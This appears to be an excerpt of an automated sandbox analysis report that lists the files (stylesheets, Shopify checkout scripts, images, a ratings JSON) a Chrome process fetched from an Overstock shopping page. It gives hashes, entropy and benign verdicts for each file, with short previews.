                                                                                                                                                          Preview:.footer{padding:calc(2 * var(--space-unit)) 0 calc(10 * var(--space-unit))}.back-to-top+.footer{border-top:0}.footer a:not(.btn){transition:-webkit-text-decoration .2s ease-out;transition:text-decoration .2s ease-out;transition:text-decoration .2s ease-out,-webkit-text-decoration .2s ease-out;color:currentColor;-webkit-text-decoration:underline transparent 1px;text-decoration:underline transparent 1px;text-underline-offset:.25rem}.footer a:not(.btn):hover{text-decoration-color:currentColor}.footer .input-with-button{box-shadow:inset 0 0 0 var(--input-border-width) rgba(var(--text-color)/.2)}.footer .input-with-button:focus-within{box-shadow:inset 0 0 0 var(--input-border-width) currentColor}.footer .input-with-button>.btn{border:0}.footer .media{display:inline-block}.footer .social{display:inline-flex}.footer__main>.footer-col:first-child .disclosure{border-top:0}.footer-block+.footer-block{margin-top:calc(12 * var(--space-unit))}.footer-block__btns,.footer-col--newsletter .input-with-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (7952)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7953
                                                                                                                                                          Entropy (8bit):5.290722168530986
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BDD7795B927658CE03F98341DFD43E8A
                                                                                                                                                          SHA1:077BA8E196820E029E12BE9DF0578B59DED5D93B
                                                                                                                                                          SHA-256:2E073C11243D21647C64FE06C134DD83FEC56DC0BA0D2E7D4E97BC699DF97988
                                                                                                                                                          SHA-512:DFA8FC4E4D28CE84F3429082AB24B67EE510280D6D3DECE2DB07A8C14214D69BBD774010B83A008929639E8D7C66F1A1A666FA72DD9550A944C999775C572C3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DutyOptions.DEq1TeKt.js
                                                                                                                                                          Preview:import{A as E,bg as V,b0 as J,H as $,y as A,e as b,b7 as U,j as W,a as e,a_ as Y,a9 as K,di as X,a7 as C,aV as Z,cd as O,cv as ee,d5 as ie,bp as ne,aa as M,aY as te,a$ as re,cf as x,ay as j,cc as se,dj as oe,c_ as ae,T as pe,aF as ce,cj as B,dk as le,ca as ue,u as de,dl as he,a3 as ge,a2 as ye,dm as fe,b4 as me,dn as Se,d as _e,as as ve,q as be,dp as I,dq as De}from"./app.CRtF78CU.js";import{S as Pe,a as k}from"./SubscriptionPriceBreakdown.CcRBYBQn.js";import{S as Ce,D as Re}from"./useAmazonContact.WvHD3hTp.js";const Le={id:"ca32d1a1360abc73acf9c215a92ce9283175d9aa48b70e909517b6ccfe9467a7",type:"query",name:"ShippingRatesStatusQuery",source:"query ShippingRatesStatusQuery($token:String!){shippingRatesStatus(token:$token)}"},Ie=i=>{const t=E(!1),o=E(!1),r=E(0),a=V(),{value:n,loading:p}=J(),{negotiate:u}=$();return A(()=>{o.current=p},[p]),A(()=>{let c;n&&n.status==="filled"&&n.intermediateRates&&n.shippingRatesStatusToken&&n.progressiveRatesEstimatedTimeUntilCompletion?(t.current=!0,r.c
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31003
                                                                                                                                                          Entropy (8bit):7.960718893935689
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:66EAC0158C9FAEB4AC4E56A879D7D234
                                                                                                                                                          SHA1:265CACB50E41CB84B9A0FE4B6CA9A8828FF21921
                                                                                                                                                          SHA-256:1D57FC14711B63E278A5B61A2CF0B8F03C23B359059628ED92CFAC60A2A7C5B5
                                                                                                                                                          SHA-512:3A9262CEFB407DF031883C238067DB29B035EA2EC5904DF42C00AE3B31E247A127AE8EF5D18E9D7C7D9D426FCA9905BFBEC91C5450075DCCC7AD76518CA26FA8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................?.....b.z|..6.....!..*"...._VW.....u.......r..$*.3...m.....z.....W.....e?..z:......9. .g.....$Y.C.6..so..U.3,.=#Y..A&......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3435)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3539
                                                                                                                                                          Entropy (8bit):5.310182195176038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4367220CBD5FB731B78321F742D2B671
                                                                                                                                                          SHA1:97C0E2B80C586E7AA32F1E136C96B07FB84512A3
                                                                                                                                                          SHA-256:7179ABC6BAE0BAA913714F12352B04A58D021103AAD23F3279DFA166A5BB2F30
                                                                                                                                                          SHA-512:EC54F0BE628831453E92AE01AB380A8FC184CF44E8CFF52346C77D169674669487FEAB1CC759C2C502F4CDB51CC9425C5D4C29133D4AB5BD46D731FEC85B5555
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/os-write-review.css?v=14610245993518191431729142870
                                                                                                                                                          Preview:.p-w-r .pr-btn-fileinput,.p-w-r a{color:#d90023}.p-w-r .pr-btn-fileinput:hover,.p-w-r a:hover{color:#ac1b25}.p-w-r .pr-accessible-btn,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a{background-color:#d90023;border-bottom:0;border-radius:2px;cursor:pointer}#pr-reviewdisplay .p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a{background-color:#252525}.p-w-r .pr-accessible-btn:active,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a:active,.p-w-r .pr-accessible-btn:hover,.p-w-r .pr-review-snapshot .pr-review-snapshot-simple .pr-review-snapshot-snippets .pr-snippet-read-and-write a:hover{background-color:#ac1b25;color:#fff}.p-w-r .form-control:focus{box-shadow:0 0 0 2px #252525;border-color:#252525}.p-w-r .pr-btn.active{background-color:#5a5a5a}.p-w-r input:focus+label.pr-btn,.p-w-r input:focus+label.pr-lab
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32451
                                                                                                                                                          Entropy (8bit):7.959397956359876
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6F5B2C233E1FA354E8B6E1130D4295B1
                                                                                                                                                          SHA1:E9A2A3DF0150F0EAFF1E584F5A43C63A4C993D3D
                                                                                                                                                          SHA-256:AEAE4B90A2987A9AC04C257D78F8F61987AEEEE299EF0FE3EB76B6FCB36703BB
                                                                                                                                                          SHA-512:61DDBA1BB6DB5C557D1401C32871F8D171788877D0A1387D658E7462A70C8D52941DB55FE7AC2FB952FBE4D670CC0ED728C2E5E7D3E0776DDA5D0C3D88EBFBD5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................y..d`.......L...(h....}E.......s|..H..B.&3....Cf..C`.|.z.0....X.a..3=N"p.?...`0..X..Q-. .:....)x!"k<...-.7h..x<..........V..G..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (33115)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):82790
                                                                                                                                                          Entropy (8bit):5.470590460918565
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CDC21EE34AB27A04B29594AA2DA7924C
                                                                                                                                                          SHA1:4D09150BA4A2623113D18E9C73D3CB21F546602A
                                                                                                                                                          SHA-256:AB8B6962931B6DC7F15584851C4B36922F3B9816EFA83340925C7CCCD42976EF
                                                                                                                                                          SHA-512:84D72FEE927CD83D4D1226E848D2B3BC938CB9414407FCEF9236D880935762D341F4CC1BB544CBEB3D85F514F85721D5DC66D3AFEF4147E61D155884DCA61258
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.C7lQ-Nke.js
                                                                                                                                                          Preview:import{ej as _t,ek as Et,q as H,kX as Ae,T as K,y as D,A as q,ad as st,a as E,aa as kt,h as nt,bL as Re,D as Jt,kY as Oe,kZ as nn,dK as on,k_ as rn,k$ as fe,l0 as sn,l1 as an,l2 as cn,_ as I,l3 as ln,l4 as un,l5 as pe,l6 as qt,ab as Mt}from"./app.CRtF78CU.js";const Le=_t({autoOpened:!1,dispatch:()=>{throw new Error("Invalid attempt to call dispatch outside of AuthorizeStateProvider")},loaded:!1,modalAnimating:!1,modalVisible:!1,sessionDetected:!1}),re=()=>Et(Le),Pe=_t({client:void 0,leaveBreadcrumb:()=>{throw new Error("Invalid attempt to call leaveBreadcrumb outside of context.")},notify:()=>{throw new Error("Invalid attempt to call notify outside of context.")}}),St=()=>{const t=Et(Pe);if(!t)throw new Error("Invalid attempt to use useBugsnag outside of BugsnagProvider.");return t},dn={analyticsData:{analyticsTraceId:""},getTrekkieAttributes:async()=>Promise.resolve({}),produceMonorailEvent:()=>{throw new Error("Invalid attempt to call produceMonorailEvent outside of context.")},track
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):122
                                                                                                                                                          Entropy (8bit):5.1414427194822405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:61C47F2AC2B958728F19F61FA762D968
                                                                                                                                                          SHA1:24DB241FC0432F9A3D15FE084168905B1FABC208
                                                                                                                                                          SHA-256:C917950DADA8F6EDFD4CC12CF0DDCC72C4489AB700B6D43D1C61CFA6C40255B3
                                                                                                                                                          SHA-512:6F87B31E28A64E83B0996C9466E5EFBEE4E8B5FFC9603E130709EF86446558C500A2D43FEE324A62EC7135A4F594D5DBED808114C005F68F6A1A0DDB356561FA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLogo.D_HPU8Dh.css
                                                                                                                                                          Preview:._8ssCG{width:59px}.zS4x6{width:68px}.PrlUn{width:84px}.SsCEp{width:100px}.aTkbO{vertical-align:middle;margin-bottom:1px}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (3841)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3842
                                                                                                                                                          Entropy (8bit):5.241519727704623
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C6A1EDFD80C744931B012833FE9B3A48
                                                                                                                                                          SHA1:18F1B60F31A1A052EDB1FC1C178A11A79D8687C9
                                                                                                                                                          SHA-256:3AE7102B63BE2D15A0978B735A262BB2AEDC0FBA5A5A9E03668A6F41D360E812
                                                                                                                                                          SHA-512:F0804D07DB14AFC9BC8605B0ACDE710B4334F9F063AA744B9E402E325A7D3E0ECB04DEF81E4C91B8C84CD40B3A878209E42E6BB58B911FD66FD549999555B95F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Section.DDmRJFSq.js
                                                                                                                                                          Preview:import{A as k,y as O,e as B,cr as A,oX as E,mr as H,k as c,h as L,eG as D,bQ as C,q as R,oY as P,a as e,ay as U,aF as T,oZ as w,a6 as u,V as h,bT as V,aW as I,a9 as Q,a8 as q,bU as F,o_ as N,ct as f,ax as j,aa as d,kH as G,aH as J,kI as X,j as Y}from"./app.CRtF78CU.js";const Z=6e4;function ie({enabled:n,onTimeout:i,timeout:r=Z}){const s=k(null),a=k(i);a.current=i,O(()=>{if(n)return s.current=setTimeout(()=>a.current(r),r),()=>{s.current&&clearTimeout(s.current)}},[n,r])}const $="WPQk2",K="qReyn",x={IconText:$,Button:K};function re(){const n=B(),{currentDetour:i}=A(),r=i?.type==="shopPayLogin",s=E("bottom"),a=H(s),o=c.default("block").when({viewportInlineSize:{min:"medium"}},"none"),l=r||a,[t,m]=L(l),S=D(),b=C({base:!0,medium:!1}),v=n("order_summary.title","Order summary"),W=R(()=>m(M=>!M),[]),{merchandiseLinesWithCount:_}=P();if(!b&&S)return null;if(_<=1)return e(h,{display:o,children:[e(U,{spacing:"large200",children:[e(T,{level:1,children:v}),e(w,{skipWrappingSection:!0,hideAccessibi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1573)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1650
                                                                                                                                                          Entropy (8bit):5.034333974094437
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CC820DB100DD68D119495F737D707CE3
                                                                                                                                                          SHA1:6052580F01E7202390C89166CBFB3CC35D1B8E53
                                                                                                                                                          SHA-256:E157C7891BB33BDA5C872B8C6CB6EBC2837BD4DBAF93A6B70CAF81E6CCDA1E40
                                                                                                                                                          SHA-512:B425520DDB755A4A82DAA14614EEEC3092606B62E03BEE0B220119F138B84CC0A9AFBB00A6FC0FA307B4482AECF31C8C31D9319CAB706871672852732F12F971
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(){var __sections__={};(function(){for(var i=0,s=document.getElementById("sections-script").getAttribute("data-sections").split(",");i<s.length;i++)__sections__[s[i]]=!0})(),function(){if(__sections__.footer)try{customElements.whenDefined("details-disclosure").then(()=>{class FooterMenu extends DetailsDisclosure{constructor(){super(),this.reset(!1),window.addEventListener("on:breakpoint-change",this.reset.bind(this))}reset(){const isLargeScreen=window.matchMedia(theme.mediaQueries.md).matches,isConfirmNewsletter=!isLargeScreen&&window.location.hash==="#footer-signup_form"&&this.querySelector("#footer-signup_form")!==null;this.disclosure.open=isLargeScreen||isConfirmNewsletter,isLargeScreen?this.toggle.setAttribute("tabindex","-1"):this.toggle.removeAttribute("tabindex")}}customElements.define("footer-menu",FooterMenu)})}catch(e){console.error(e)}}(),function(){if(__sections__.header)try{customElements.whenDefined("details-disclosure").then(()=>{class NavMenu extends DetailsDis
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):61494
                                                                                                                                                          Entropy (8bit):5.509294474899683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A6FD12AD34FA84D2D96E3C81F5A7DB0A
                                                                                                                                                          SHA1:08E5AF621FBF1B6EC06E79F43F822D5200959C76
                                                                                                                                                          SHA-256:B15212D32FF8727033E218E2DB453EFB37EB4FF5F83508771D3E11D10DDD10A1
                                                                                                                                                          SHA-512:D43F8F78EF6CC6DB9BD42900CEADCD2E4347860DB58CBD189A35E0E5099CE705D65FAF168077BA770DB95F74EDF44E8EDDC3BEB6B4BBFC706AB7A50F85DCE394
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm@8688a91bwbd065f36p51297ecfmc385dee2/web-pixel-406552735@4fd0680eed907adaf3f85849c393d688/sandbox/worker.modern.js
                                                                                                                                                          Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7124
                                                                                                                                                          Entropy (8bit):7.827690517699779
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:01BE56305124C0A04934AE95AA871423
                                                                                                                                                          SHA1:AD74D3D590D359602D9414B1983C66D0A8726944
                                                                                                                                                          SHA-256:C9B93248E4F104E796E8E51FB8F9E2989E4368ABA7FFEA4BF3EDA870E8399B82
                                                                                                                                                          SHA-512:07B227B23754E5FA238FD433D54123E151F213261FB21A474B39B30921CBF59A3DB3E08661444B57A50D3D466F42EB90A6F66649178AEB4B253D3E034C30D6FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Polytrends-Laguna-All-Weather-Poly-Outdoor-Adirondack-Chair-_28Set-of-4_29---Foldable_c477c242-ef19-4182-a78c-19c4ab1f1f2f.jpg?v=1728075295&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 <....o...*@.@.>9..D"!..Yu. ...._:o.Y.s.............}.y........,.0.c..._.....=Q...M........F~`?....N...w........i.....[./.c...C....`.....P.....Q...#..........P..}b.....N...M6..u?....G........O.^....G....4.m..........<z~........?.?.........S.....`.................%UUUUUUH.m.OBY~...\M.E..oy..........\..e....z...;......\..........x.3.g.ql_(.......).r...N..}F.+.......*.v..m.a.6..t'.......Bv....6...%6.....Q.:c......}.Tf....7Z.u"ffb..G.)..#.X@v.g...{.....&..t..k.b.Z#..."U..P].Vu..!.ShJ_.%Adk.........s.;.?r*3.M.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):76160
                                                                                                                                                          Entropy (8bit):7.993896931957477
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:DAB30306D29CE75E04353537211472EB
                                                                                                                                                          SHA1:A26C7AD0DD6EEA603993F3F7760AE39FBA106819
                                                                                                                                                          SHA-256:4BB9CB916F06A12D4E1CDA80438A9C6EB85EEA94005E4BAFAA85EE6E73D13F24
                                                                                                                                                          SHA-512:8EC0F8F12AE79D02F18C501A65926721A05A71EDF2176A9A7013755CA005838C8B8EEA4CE7248369AA4DFBDEE14ABFCFB543F153106F3BED8ADA2F31EB2ACC06
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10102024-MOPS-800X800_Hero_Apparel.jpg?v=1728487084&width=650
                                                                                                                                                          Preview:RIFFx)..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .&..P....*....>E..D"..#'.[.`..M..............,Y..G(...hm..^.......~...._..k.l.W..x...../..m_.........O.?.?..........?.....?......G.../p?.....?..........G.o....?............o...>............O.O...?.~y|....b.Q.S./...?.?..?._?..........'............5...o......@...@?.z.~.w.~.~F{.......,....._.............T......R?.}..........~......?.O.~......../..?..s.'.[....O...p?......%........E....._............V...:...G......?.xz~/...O...`_.......s................_..._!_.?..........o..........Y...../........l.z..q'%V.t....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):145
                                                                                                                                                          Entropy (8bit):4.68977342098908
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3114014306935384046EB0E383EA936B
                                                                                                                                                          SHA1:D95A8D4999AD0AB1E2DD7CD4082151CA100CAF54
                                                                                                                                                          SHA-256:FA166FCC73A7A95CF6D50A46F79940E68FCB1039CB2B962ADC77394F89A53C77
                                                                                                                                                          SHA-512:3B82A661B1AE0F8618887D88A5942C5AFE39EA92B4E14F460B4509B61830EF8E5551DCCA1F7852C6DDC660266A0ADDEA18FEEBDA3BF72AC6091429F0FD4D7E90
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"33212752","rollup":{"average_rating":4.69,"rating_count":35,"review_count":35,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1742)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1890
                                                                                                                                                          Entropy (8bit):4.981181392705749
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:690B1515471097F50CE16F819AD524CF
                                                                                                                                                          SHA1:9DB9C8E8E160147B285B7017B1A0E2FAAD22F60D
                                                                                                                                                          SHA-256:668F3B8FFB55417D8A6D89C7A49BEE2DD74A360EF5A7167EA357507D41476F99
                                                                                                                                                          SHA-512:AF6CF609267F29F2D4D173633CE5FA66BC4EAC56ABF345C4E22F5A15C488345B3D7A23706EFFFECE50BBC1BCDCFC0843EB95F6E046E6D8F685CBBCC3627DA291
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/flickity.css?v=138020229515364061511729142870
                                                                                                                                                          Preview:/*! Flickity v2.3.0.https://flickity.metafizzy.co.---------------------------------------------- */.flickity-enabled{position:relative}.flickity-enabled:focus{outline:none}.flickity-viewport{overflow:hidden;position:relative;height:100%}.flickity-slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-tap-highlight-color:transparent;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-button{position:absolute;background:#ffffffbf;border:none;color:#333}.flickity-button:hover{background:#fff;cursor:pointer}.flickity-button:focus{outline:none;box-shadow:0 0 0 5px #19f}.flickity-button:active{opacity:.6}.flickity-button:disabled{opacity:.3;cursor:auto;pointer-events:none}.flickity-button-icon{fill:currentColor}.flickity-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3837)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3935
                                                                                                                                                          Entropy (8bit):5.0200076628123735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:615EEE5F8BAAB5BA74FE009FC0B11061
                                                                                                                                                          SHA1:AF81AF99929D4473F0B56D455F42B61B44BB3110
                                                                                                                                                          SHA-256:E572CD371D4C9D47F5E50399684D64210FFD3840454556B2060BCFA04D6B06EA
                                                                                                                                                          SHA-512:DC335423BDCF420A78755CCA461E7F78FC26E271FC0D57BAD9648E53244FFB1544263C09AA7518D17EE9D2CF13C8FFAFF7CBFA3947344F7C2F2C09764FD9610F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/lightbox.css?v=161329142568396907661729142870
                                                                                                                                                          Preview:.entry-lightbox{bottom:0;left:0;outline:none;pointer-events:all;position:fixed;right:0;top:0;z-index:1030;opacity:1}.cl-dialog-form-submit{display:flex;-webkit-box-pack:center;justify-content:center;-webkit-box-align:center;align-items:center;background:#d90023;border:1px solid rgb(217,0,35);border-radius:2px;color:#fff;cursor:pointer;font-size:12px;max-height:34px;width:88px;margin-left:8px;min-width:88px}.cl-dialog-body-modal{border-radius:2px;bottom:auto;box-shadow:0 2px #54565833;left:50%;top:50%;align-items:flex-start;background:#fff;border:1px solid #dadcdf;box-sizing:border-box;display:flex;flex-direction:column;position:fixed;transform:translate3d(0,110%,0);transition:opacity .35s ease,transform .35s ease;width:100%;min-width:365px;max-width:375px;min-height:325px;max-height:335px;transform:translate3d(-50%,-50%,0) scale(1);opacity:1}.cl-dialog-close{background:none;border:none;cursor:pointer;display:inline-block;line-height:1;padding:8px;position:absolute;right:4px;top:3px}.cl
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1522)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1523
                                                                                                                                                          Entropy (8bit):5.339931727491917
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3C856DF96599414A8EA5EA129DB52D72
                                                                                                                                                          SHA1:C10442E0A1AB8E6DFE08912BB6633943A3B8EEDE
                                                                                                                                                          SHA-256:7B4F02F3C28AB4E452C9CF843881F51DF2E18F9B9C9E32482C8C5C66CBA75842
                                                                                                                                                          SHA-512:16EB6A53306A89C1DB9610F9272C06E2DCA7CA02DDB6CC48CB1C5EECD9CC55DDC48B32FAEDDFBDF555C1CCF58DCF997A6030938BBC3897F1BE3E49D9BD272A04
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useUnauthenticatedErrorModal.gdEu53Hp.js
                                                                                                                                                          Preview:import{c as d,d as p,ct as f,j as g,T as y,ly as C,z as S,o as b,aN as k,q as v,cy as h,cC as w,cJ as P}from"./app.CRtF78CU.js";var E=(o=>(o.Generic="generic",o.SignInFailed="sign_in_failed",o.ContinueWithShopPay="continue_with_shop_pay",o))(E||{});const M=d(null);function A(){return p(M)}const _=o=>({backgroundColor:e,foregroundColor:n})=>{const s=m(e),t=m(n),a=Math.max(s,t),r=Math.min(s,t),c=(a+.05)/(r+.05);return{isValidContrast:c>=o,ratio:Math.round(c*100)/100}},I=_(3.06);function m(o){const n=o.toRgbTuple().map(s=>{const t=s/255;return t<=.04045?t/12.92:((t+.055)/1.055)**2.4});return .2126*n[0]+.7152*n[1]+.0722*n[2]}const u=new C(0,0,100);function F({foregroundColor:o,backgroundColor:e,section:n="main"}){const s=f(),{colors:t}=g(),a=s[n];let r=u;if(e!==void 0)r=e;else if(a.colorScheme==="inherit"){const{background:i,colorScheme:l}=s.canvas;l&&i!=="transparent"&&(r=t.schemes?.[l]?.base?.background??u)}else{const i=a.colorScheme;r=i?t.schemes?.[i]?.base?.background??u:u}const{isVali
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
